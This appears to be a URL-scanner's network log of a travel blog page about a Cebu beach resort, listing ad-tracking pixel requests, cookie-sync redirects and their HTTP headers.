report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=aCIBdIg2hSZRlNu3fFRJcC1EelbExQoTXS8JvbsaBnCQke7%2Bne1PNKjAfVbcu6qzRdYJitlxOfMhRsBo2jvOikV3em03W2LG9CtQYR2rem%2ByjyP1FPU4rOvW2HDIujQ%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: image/png
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
accept-ranges: bytes
cf-ray: 6396de35589d4ddc-FRA
expires: Sat, 02 Apr 2022 03:11:07 GMT

GET
DATA 200
OK truncated
/ 43 B
0 Image
image/gif

General

Check archive.org

Show headers Download Go to Show image

Full URL: data:truncated
Protocol: DATA
Server: -, , ASN (),
Reverse DNS
Software: /
Resource Hash: b1442e85b03bdcaf66dc58c7abb98745dd2687d86350be9a298a1d9382ac849b

Request headers

Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

Content-Type: image/gif

GET
H2 200 dpixel
cms.quantserve.com/ Frame 5297 35 B
462 B 10ms
7ms Image
image/gif 2620:116:800d:21:5a23:9c4e:e774:96c1
AMAZON-02

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://cms.quantserve.com/dpixel?a=p-n5vvLvRdjg0ek&eid=0&qc_google_push=&google_gid=CAESEPrI2ou_d5NTjCCcsXgSssk&google_cver=1&google_push=AQvitUJxIZQZCoF0K1xlnouX56qVT7DoWVUHShb0jlQn_OhPtjjCK4rnc_L-NUAhskGofovm3yQdU2ITXIF_MSPDd0K-oLur7LQ

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224

Protocol

Security

TLS 1.2, ECDHE_RSA, AES_128_GCM

Server

2620:116:800d:21:5a23:9c4e:e774:96c1 , United States, ASN16509 (AMAZON-02, US),

Reverse DNS

Software

Resource Hash

a0d3a0aff7dc3bf32d2176fc3dcda6e7aba2867c4f4d1f7af6355d2cfc6c44f8

Security Headers

Name	Value
Strict-Transport-Security	max-age=86400

Request headers

Referer: https://pagead2.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
strict-transport-security: max-age=86400
p3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
cache-control: private, no-cache, no-store, proxy-revalidate
content-type: image/gif
content-length: 35
expires: Fri, 04 Aug 1978 12:00:00 GMT

GET
H3-Q050

200

pixel
cm.g.doubleclick.net/ Frame 5297
Redirect Chain

https://id.rlcdn.com/466606.gif?cparams=google_push%3DAQvitUILMYPpeZopDagQtekaBfoIHBkakwEHutc7sIlI9m1dph7ako1npOoUKz8P5gIpB5TFQAX0Uou3yAoIVVrwfzOrjV9Fc_9I&google_gid=CAESEJCf_jXCUDWShEEU86R6W8E&goo...
https://id.rlcdn.com/1000.gif?memo=CK69HBoNCMuWmoMGEgUI6AcQAEIASnBnb29nbGVfcHVzaD1BUXZpdFVJTE1ZUHBlWm9wRGFnUXRla2FCZm9JSEJrYWt3RUh1dGM3c0lsSTltMWRwaDdha28xbnBPb1VLejhQNWdJcEI1VEZRQVgwVW91M3lBb0lWVn...
https://cm.g.doubleclick.net/pixel?google_nid=liveramp&google_hm=WGMzMDcwYVNFdUJiQmVwTVd2NDRWaWk0U3dRTTFzNFc5UnA2OEtIa3NUSk1XWXVmUQ==&google_push

170 B
190 B

43ms
42ms

Image
image/png

142.250.186.162
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://cm.g.doubleclick.net/pixel?google_nid=liveramp&google_hm=WGMzMDcwYVNFdUJiQmVwTVd2NDRWaWk0U3dRTTFzNFc5UnA2OEtIa3NUSk1XWXVmUQ==&google_push

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

142.250.186.162 , United States, ASN15169 (GOOGLE, US),

Reverse DNS

fra24s08-in-f2.1e100.net

Software

HTTP server (unknown) /

Resource Hash

0b8a20373c6dd04e091902226d922b3688143a8938afb9d283d889de7b55ceb5

Security Headers

Name	Value
X-Xss-Protection	0

Request headers

Referer: https://pagead2.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
server: HTTP server (unknown)
content-type: image/png
cache-control: no-cache, must-revalidate
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 170
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

Redirect headers

date: Fri, 02 Apr 2021 03:11:07 GMT
via: 1.1 google
p3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
location: https://cm.g.doubleclick.net/pixel?google_nid=liveramp&google_hm=WGMzMDcwYVNFdUJiQmVwTVd2NDRWaWk0U3dRTTFzNFc5UnA2OEtIa3NUSk1XWXVmUQ==&google_push
cache-control: no-cache, no-store
timing-allow-origin: *
alt-svc: clear
content-length: 0

GET
H3-Q050

200

pixel
cm.g.doubleclick.net/ Frame 5297
Redirect Chain

https://rtb.openx.net/sync/dds?google_gid=CAESEKphPwnMgTjK7V1HnSb10ww&google_cver=1&google_push=AQvitULxIdO-fvE7UTHx26aQ2TA3kAw-ZZ72jP0vDEXhI7cv0bKA1LZ5FdqImWezFJ4eXUdJ_Jf0m5wVvLrcLn_jov0Pt-a-ywI
https://rtb.openx.net/sync/dds?google_gid=CAESEKphPwnMgTjK7V1HnSb10ww&google_cver=1&google_push=AQvitULxIdO-fvE7UTHx26aQ2TA3kAw-ZZ72jP0vDEXhI7cv0bKA1LZ5FdqImWezFJ4eXUdJ_Jf0m5wVvLrcLn_jov0Pt-a-ywI&o...
https://cm.g.doubleclick.net/pixel?google_nid=open&google_push=AQvitULxIdO-fvE7UTHx26aQ2TA3kAw-ZZ72jP0vDEXhI7cv0bKA1LZ5FdqImWezFJ4eXUdJ_Jf0m5wVvLrcLn_jov0Pt-a-ywI&google_hm=jFhGaOJvwhcempX9hXIw-Q==

170 B
190 B

42ms
42ms

Image
image/png

142.250.186.162
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://cm.g.doubleclick.net/pixel?google_nid=open&google_push=AQvitULxIdO-fvE7UTHx26aQ2TA3kAw-ZZ72jP0vDEXhI7cv0bKA1LZ5FdqImWezFJ4eXUdJ_Jf0m5wVvLrcLn_jov0Pt-a-ywI&google_hm=jFhGaOJvwhcempX9hXIw-Q==

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

142.250.186.162 , United States, ASN15169 (GOOGLE, US),

Reverse DNS

fra24s08-in-f2.1e100.net

Software

HTTP server (unknown) /

Resource Hash

0b8a20373c6dd04e091902226d922b3688143a8938afb9d283d889de7b55ceb5

Security Headers

Name	Value
X-Xss-Protection	0

Request headers

Referer: https://pagead2.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
server: HTTP server (unknown)
content-type: image/png
cache-control: no-cache, must-revalidate
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 170
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

Redirect headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:06 GMT
via: 1.1 google
server: Cowboy
access-control-allow-origin: null
vary: Origin
p3p: CP="CUR ADM OUR NOR STA NID"
location: https://cm.g.doubleclick.net/pixel?google_nid=open&google_push=AQvitULxIdO-fvE7UTHx26aQ2TA3kAw-ZZ72jP0vDEXhI7cv0bKA1LZ5FdqImWezFJ4eXUdJ_Jf0m5wVvLrcLn_jov0Pt-a-ywI&google_hm=jFhGaOJvwhcempX9hXIw-Q==
access-control-expose-headers
cache-control: private, max-age=0, no-cache, must-revalidate
access-control-allow-credentials: true
alt-svc: clear
content-length: 0
x-request-id: gvoif8lof6dajukjrq91o8b473sksa2g

GET
H3-Q050

200

pixel
cm.g.doubleclick.net/ Frame 5297
Redirect Chain

https://image6.pubmatic.com/AdServer/UCookieSetPug?oid=1&rd=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dpmeb%26google_sc%3D1%26google_hm%3D%23%23B64_16B_PM_UID%26google_redir%3Dhttps%...
https://image6.pubmatic.com/AdServer/UCookieSetPug?oid=1&rd=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dpmeb%26google_sc%3D1%26google_hm%3D%23%23B64_16B_PM_UID%26google_redir%3Dhttps%...
https://cm.g.doubleclick.net/pixel?google_nid=pmeb&google_sc=1&google_hm=DOoo2jzrRQiT8_S2BVeZ4A%3D%3D&google_redir=https%3A%2F%2Fimage8.pubmatic.com%2FAdServer%2FImgSync%3Fsec%3D1%26p%3D156578%26mp...

170 B
190 B

42ms
42ms

Image
image/png

142.250.186.162
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://cm.g.doubleclick.net/pixel?google_nid=pmeb&google_sc=1&google_hm=DOoo2jzrRQiT8_S2BVeZ4A%3D%3D&google_redir=https%3A%2F%2Fimage8.pubmatic.com%2FAdServer%2FImgSync%3Fsec%3D1%26p%3D156578%26mpc%3D4%26fp%3D1%26pu%3Dhttps%253A%252F%252Fimage4.pubmatic.com%252FAdServer%252FSPug%253Fp%253D156578%2526sc%253D1&google_push=AQvitUIVnSqsWd0gCrnm7wSVOGtvUZ11_7S5MPpYZU0zaz6a2T4NVySwjCNtkql5UVcCOOGeyemk-TpUiCPAglM_r7mOV32tc0Zw

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

142.250.186.162 , United States, ASN15169 (GOOGLE, US),

Reverse DNS

fra24s08-in-f2.1e100.net

Software

HTTP server (unknown) /

Resource Hash

0b8a20373c6dd04e091902226d922b3688143a8938afb9d283d889de7b55ceb5

Security Headers

Name	Value
X-Xss-Protection	0

Request headers

Referer: https://pagead2.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
server: HTTP server (unknown)
content-type: image/png
cache-control: no-cache, must-revalidate
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 170
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

Redirect headers

Location: https://cm.g.doubleclick.net/pixel?google_nid=pmeb&google_sc=1&google_hm=DOoo2jzrRQiT8_S2BVeZ4A%3D%3D&google_redir=https%3A%2F%2Fimage8.pubmatic.com%2FAdServer%2FImgSync%3Fsec%3D1%26p%3D156578%26mpc%3D4%26fp%3D1%26pu%3Dhttps%253A%252F%252Fimage4.pubmatic.com%252FAdServer%252FSPug%253Fp%253D156578%2526sc%253D1&google_push=AQvitUIVnSqsWd0gCrnm7wSVOGtvUZ11_7S5MPpYZU0zaz6a2T4NVySwjCNtkql5UVcCOOGeyemk-TpUiCPAglM_r7mOV32tc0Zw
Date: Fri, 02 Apr 2021 03:11:05 GMT
P3p: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Length: 0
Content-Type: text/html; charset=UTF-8

GET
H3-Q050

200

pixel
cm.g.doubleclick.net/ Frame 5297
Redirect Chain

https://pixel.rubiconproject.com/exchange/sync.php?p=dfp&google_gid=CAESEAVcNoRvVmtH4HBDizNNCTo&google_cver=1&google_push=AQvitUJLqHmcCFX01kE_3mjkaJJN3WHC3ON5eyYRbb6CWEmSGa5pNiZoW_wXDLi7JTB1lOlsYzc...
https://cm.g.doubleclick.net/pixel?google_nid=rp&google_hm=S01aUUNMSUEtMy03V0hW&google_push=AQvitUJLqHmcCFX01kE_3mjkaJJN3WHC3ON5eyYRbb6CWEmSGa5pNiZoW_wXDLi7JTB1lOlsYzcYyw00qNpKgujC5rvRtlkChrI

170 B
190 B

79ms
57ms

Image
image/png

142.250.186.162
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://cm.g.doubleclick.net/pixel?google_nid=rp&google_hm=S01aUUNMSUEtMy03V0hW&google_push=AQvitUJLqHmcCFX01kE_3mjkaJJN3WHC3ON5eyYRbb6CWEmSGa5pNiZoW_wXDLi7JTB1lOlsYzcYyw00qNpKgujC5rvRtlkChrI

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

142.250.186.162 , United States, ASN15169 (GOOGLE, US),

Reverse DNS

fra24s08-in-f2.1e100.net

Software

HTTP server (unknown) /

Resource Hash

0b8a20373c6dd04e091902226d922b3688143a8938afb9d283d889de7b55ceb5

Security Headers

Name	Value
X-Xss-Protection	0

Request headers

Referer: https://pagead2.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
server: HTTP server (unknown)
content-type: image/png
cache-control: no-cache, must-revalidate
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 170
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

Redirect headers

Pragma: no-cache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: https://cm.g.doubleclick.net/pixel?google_nid=rp&google_hm=S01aUUNMSUEtMy03V0hW&google_push=AQvitUJLqHmcCFX01kE_3mjkaJJN3WHC3ON5eyYRbb6CWEmSGa5pNiZoW_wXDLi7JTB1lOlsYzcYyw00qNpKgujC5rvRtlkChrI
Cache-Control: no-cache,no-store,must-revalidate
Content-Type: text/html
content-length: 0
X-RPHost: 78e3bdce5107450057bade54d54a0a7e
Expires: 0

GET
H3-Q050

200

pixel
cm.g.doubleclick.net/ Frame 5297
Redirect Chain

https://ssum-sec.casalemedia.com/usermatchredir?s=184023&cb=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dindex%26google_hm%3D&google_gid=CAESEM-6w14NQqpi_XhZ5ER0pJ8&google_cver=1&googl...
https://ssum-sec.casalemedia.com/usermatchredir?cb=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dindex%26google_hm%3D&google_cver=1&google_gid=CAESEM-6w14NQqpi_XhZ5ER0pJ8&google_push=AQ...
https://cm.g.doubleclick.net/pixel?google_nid=index&google_hm=YGaLS8v3KqYvLxF0RhySFQAAApAAAAIB&google_gid=CAESEM-6w14NQqpi_XhZ5ER0pJ8&google_push=AQvitUIK3YoDq--PObpUakKQZwpFqA3vGPDRWfkMe6BJSNuVeMc...

170 B
190 B

42ms
42ms

Image
image/png

142.250.186.162
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://cm.g.doubleclick.net/pixel?google_nid=index&google_hm=YGaLS8v3KqYvLxF0RhySFQAAApAAAAIB&google_gid=CAESEM-6w14NQqpi_XhZ5ER0pJ8&google_push=AQvitUIK3YoDq--PObpUakKQZwpFqA3vGPDRWfkMe6BJSNuVeMcQGko8TaTXS3nzANasMeQj256uMc_nccFbL2p6qu613XEZzg1G&google_cver=1

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

142.250.186.162 , United States, ASN15169 (GOOGLE, US),

Reverse DNS

fra24s08-in-f2.1e100.net

Software

HTTP server (unknown) /

Resource Hash

0b8a20373c6dd04e091902226d922b3688143a8938afb9d283d889de7b55ceb5

Security Headers

Name	Value
X-Xss-Protection	0

Request headers

Referer: https://pagead2.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
server: HTTP server (unknown)
content-type: image/png
cache-control: no-cache, must-revalidate
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 170
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

Redirect headers

Pragma: no-cache
Date: Fri, 02 Apr 2021 03:11:07 GMT
Server: Apache
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Location: https://cm.g.doubleclick.net/pixel?google_nid=index&google_hm=YGaLS8v3KqYvLxF0RhySFQAAApAAAAIB&google_gid=CAESEM-6w14NQqpi_XhZ5ER0pJ8&google_push=AQvitUIK3YoDq--PObpUakKQZwpFqA3vGPDRWfkMe6BJSNuVeMcQGko8TaTXS3nzANasMeQj256uMc_nccFbL2p6qu613XEZzg1G&google_cver=1
Cache-Control: max-age=0, no-cache, no-store
Connection: keep-alive
Content-Type: text/html; charset=iso-8859-1
Content-Length: 460
Expires: Fri, 02 Apr 2021 03:11:07 GMT

GET
H2 200 trk
ag.innovid.com/ Frame 5297 43 B
295 B 61ms
18ms Image
image/gif 2a05:d01c:1d8:8100:1c45:c4d6:f2b8:9306
AMAZON-02

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://ag.innovid.com/trk?tid=11711&google_gid=CAESEFyvsC9Uo6lfzW8cxgvB0Hg&google_cver=1&google_push=AQvitUIF0fqj5xAHDhbflkQkr49ZxxziQSOrpSRMoXEiBiFk2zM1Oz2WEnBGU2NmzRNNTjZ-CiEOwL1fVLWYyunAfhmMYGVQqJJ1
Requested by: Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224
Protocol: H2
Security: TLS 1.2, ECDHE_RSA, AES_128_GCM
Server: 2a05:d01c:1d8:8100:1c45:c4d6:f2b8:9306 London, United Kingdom, ASN16509 (AMAZON-02, US),
Reverse DNS
Software: /
Resource Hash: 4e0705327480ad2323cb03d9c450ffcae4a98bf3a5382fa0c7882145ed620e49

Request headers

Referer: https://pagead2.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:07 GMT
cache-control: no-cache
content-type: image/gif
content-length: 43
request-time: 0
expires: -1

GET
H2 204 attr
cm.g.doubleclick.net/pixel/ Frame 5297 0
236 B 116ms
39ms Image
text/html 142.250.186.162
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://cm.g.doubleclick.net/pixel/attr?d=AHNF13J6-_Qv6VtHYSZyYuxppOxry7olVfJNuMV_vi8NBG8WTTJHPnxQWjCCvEexTKexa2NXsUmH

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

142.250.186.162 , United States, ASN15169 (GOOGLE, US),

Reverse DNS

fra24s08-in-f2.1e100.net

Software

HTTP server (unknown) /

Resource Hash

e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Security Headers

Name	Value
X-Xss-Protection	0

Request headers

Referer: https://pagead2.googlesyndication.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:07 GMT
server: HTTP server (unknown)
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 0
x-xss-protection: 0
content-type: text/html

GET
H2

200

itravelrox-small-logo.png
www.itravelrox.com/wp-content/uploads/2016/07/
Redirect Chain

https://cdn.shortpixel.ai/client/to_webp,q_glossy,ret_img/https://www.itravelrox.com/wp-content/uploads/2016/07/itravelrox-small-logo.png
https://www.itravelrox.com/wp-content/uploads/2016/07/itravelrox-small-logo.png

3 KB
3 KB

14ms
14ms

Image
image/png

2606:4700:3032::6815:4c47
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to Show image

Full URL: https://www.itravelrox.com/wp-content/uploads/2016/07/itravelrox-small-logo.png
Requested by: Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2606:4700:3032::6815:4c47 , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software: cloudflare /
Resource Hash: bdaf7dfb6e3f3ffb5ec859accaf81ffa7f31ad4bc1b8327e83d07aee1a9c0930

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 03:11:07 GMT
cf-cache-status: HIT
nel: {"max_age":604800,"report_to":"cf-nel"}
age: 2
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
content-length: 2727
cf-request-id: 09322935f400004ddc2230b000000001
referrer-policy
last-modified: Sat, 23 Jun 2018 06:05:12 GMT
server: cloudflare
etag: "aa7-5b2de318-0;;;"
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: User-Agent, Accept-Encoding
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=AhIoW4d02YGydxJAYKHqURaVNzmth8X%2FAKoWleuKpEXMZWw3Fnx6JwMsKKNjNNWCPNAjeiilJ6w6%2B5iMfFzRENvFD3Vtjq34a7tJbDRf8htghjhmhsYikXzax0Em1po%3D"}],"max_age":604800,"group":"cf-nel"}
content-type: image/png
cache-control: public, max-age=31536000
x-turbo-charged-by: LiteSpeed
accept-ranges: bytes
cf-ray: 6396de3659694ddc-FRA
expires: Sat, 02 Apr 2022 03:11:05 GMT

Redirect headers

date: Fri, 02 Apr 2021 03:11:07 GMT
cdn-edgestorageid: 601, 602
access-control-allow-origin: *
access-control-expose-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
x-tag: Domain:itravelrox.com
cdn-cachedat: 2021-04-02 05:11:07
cdn-pullzone: 257218
content-length: 0
pragma: cache
access-control-allow-headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
server: BunnyCDN-DE1-713
cdn-requestpullcode: 302
x-purge: 1
location: https://www.itravelrox.com/wp-content/uploads/2016/07/itravelrox-small-logo.png
content-type: text/html; charset=UTF-8
cdn-cache: MISS
cdn-uid: ceac3dab-9909-4315-8d54-a27751b54dd0
cache-control: public, max-age=10800
